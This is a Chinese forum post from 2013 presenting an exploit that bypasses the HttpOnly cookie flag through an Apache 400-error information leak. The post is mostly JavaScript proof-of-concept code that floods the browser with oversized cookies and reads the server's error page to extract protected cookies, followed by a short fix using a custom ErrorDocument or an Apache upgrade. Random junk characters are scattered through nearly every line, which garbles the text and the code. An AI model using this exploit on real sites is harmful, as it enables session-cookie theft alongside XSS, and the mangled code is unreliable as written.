很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
5 e* l, K4 H0 d
p; i4 M* R6 ?3 F- D6 n( H/ O用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:3 |2 ^0 J) S6 Y0 T4 A: Q
, |. {2 L, }( ^; d: e
u( o: T" w: B8 p
// http://www.exploit-db.com/exploits/18442/
- O* Z; W8 w& ?function setCookies (good) {( H, R9 t( O2 T* o# V6 z) u, g
// Construct string for cookie value
/ ^) G$ U9 i. W, T: m, z. l2 Jvar str = "";
. }1 a' N8 U% A$ xfor (var i=0; i< 819; i++) {$ X( G3 W8 y9 |: N0 v5 H
str += "x";
/ L% \2 f: g! X9 R5 J}
: T @8 }* E, n$ Q; L/ c' c// Set cookies9 b# @' R5 [$ t. L: C
for (i = 0; i < 10; i++) {
( \/ D! d; U& Y* M$ Z+ ~// Expire evil cookie* ]# q* b/ l, F6 \
if (good) {
& b+ U7 z7 u" A3 \var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";1 m5 d1 c/ g d
}& z M. y3 U4 ]' N9 a! }' f
// Set evil cookie6 c& q5 g) S$ a! E4 w; @" K
else {1 j7 ~ S- |- W7 r
var cookie = "xss"+i+"="+str+";path=/";
. p4 F, |6 p% m8 y9 b* A}
, t: `2 ]! @5 _' i( fdocument.cookie = cookie;
; J/ O9 N2 k5 `7 R}7 ?) ~) |/ l. R# m% `* k) A/ q1 ?
}
1 z. S, k1 l$ Z1 C' i2 Dfunction makeRequest() {
7 e" p |& }3 t) y+ O; X# jsetCookies();( L9 [$ t# r8 M: R# d5 F/ `
function parseCookies () {; z8 [4 \3 p- G6 l8 E0 ^) w
var cookie_dict = {};
) p& d( z" k+ R- p( G// Only react on 400 status
) n: \' l$ D. b' j3 S! j. Aif (xhr.readyState === 4 && xhr.status === 400) {8 o; `7 y# S: U5 v: ~3 m% M3 o
// Replace newlines and match <pre> content
* |1 h Q& d8 y: f* w! y8 {/ Uvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
0 V* C6 \3 n% Y- W2 Qif (content.length) {. y7 [% l% z) ]
// Remove Cookie: prefix
4 t5 P8 Z9 q9 ~content = content[1].replace("Cookie: ", "");$ a7 w, n2 i; x4 ?
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);* z& w( | I: J. Q/ j; Q* R) T
// Add cookies to object% T8 O5 `8 ~5 j4 {+ ` C# y' T6 y
for (var i=0; i<cookies.length; i++) {
9 U) e2 v/ X+ [/ @1 hvar s_c = cookies.split('=',2);1 {2 a5 i7 k6 ?% B
cookie_dict[s_c[0]] = s_c[1];
( R1 D8 Z) W! E# E o; N}
" A0 H' ]/ u$ e- P' U8 ]}9 J& ~, t$ ~1 G* ?1 t
// Unset malicious cookies
2 y7 s, r$ `4 ?1 a& Q" m( UsetCookies(true); k3 |7 n8 F0 H9 J
alert(JSON.stringify(cookie_dict));
# K: W3 {5 k4 V/ n6 G3 d/ l. _}
2 c2 z. R2 v. |) w8 X}; N4 ~& Y- @. N
// Make XHR request' L- K9 h) Q" z: }4 R1 f/ |
var xhr = new XMLHttpRequest();
4 Q5 z8 o( ]6 F( qxhr.onreadystatechange = parseCookies;
$ G" B) n" [9 y2 ~7 _4 ?' Jxhr.open("GET", "/", true);# B D9 E9 y- _- r8 o
xhr.send(null);
$ N6 l: d! e) t5 T+ R}
$ T% x. T+ v) g0 K2 ]; r" C8 X2 gmakeRequest();
( b7 P) U' e' G0 B5 P6 H, n
) x6 }: M2 ?! D, q0 c5 \你就能看见华丽丽的400错误包含着cookie信息。9 d1 b! y! P( T1 E2 l7 N: O
: L; |. s2 k9 K3 `0 L
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#8 Z% w0 a S4 H
7 B) T$ O9 t; v
修复方案:
1 c# T5 w1 }( `, R
, W) d+ M+ L7 QApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下) m7 w K5 f! D! y4 x& }7 ]
4 ]" m/ ^# }- R: ?7 |. LIn the event of a problem or error, Apachecan be configured to do one of four things,$ \1 R0 Z' y2 r9 y
; W* W3 `: k0 u% ]" {/ q9 t$ {1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. u, ]; \; [9 H# z- K* q2. output acustomized message输出一段信息
5 a% d t8 Y. u$ n8 }" P% t- V3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
' U% G5 H J0 S! Y# N4. redirect to an external URL to handle theproblem/error转向一个外部URL9 b" P8 z% l. H0 y, m
- J1 B* K$ ~, y! W; j- d
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
% c5 t* _; J* F, R! f: L, Y5 C
Apache配置:7 s v( q) o* O% H4 S
H3 N b5 Y$ o+ dErrorDocument400 " security test"& X9 o i* e) N" s' N
; z) j5 @' [! d) Y
当然,升级apache到最新也可:)。" a7 m5 \9 n( _7 Y" c, |! @
! Z6 b/ u6 }# z' g参考:http://httpd.apache.org/security/vulnerabilities_22.html
! y" W% X- i% n o: w2 q
5 e, h+ m, U* E4 {4 }# V |
发表于 2013-4-19 19:15:43
收藏
支持
反对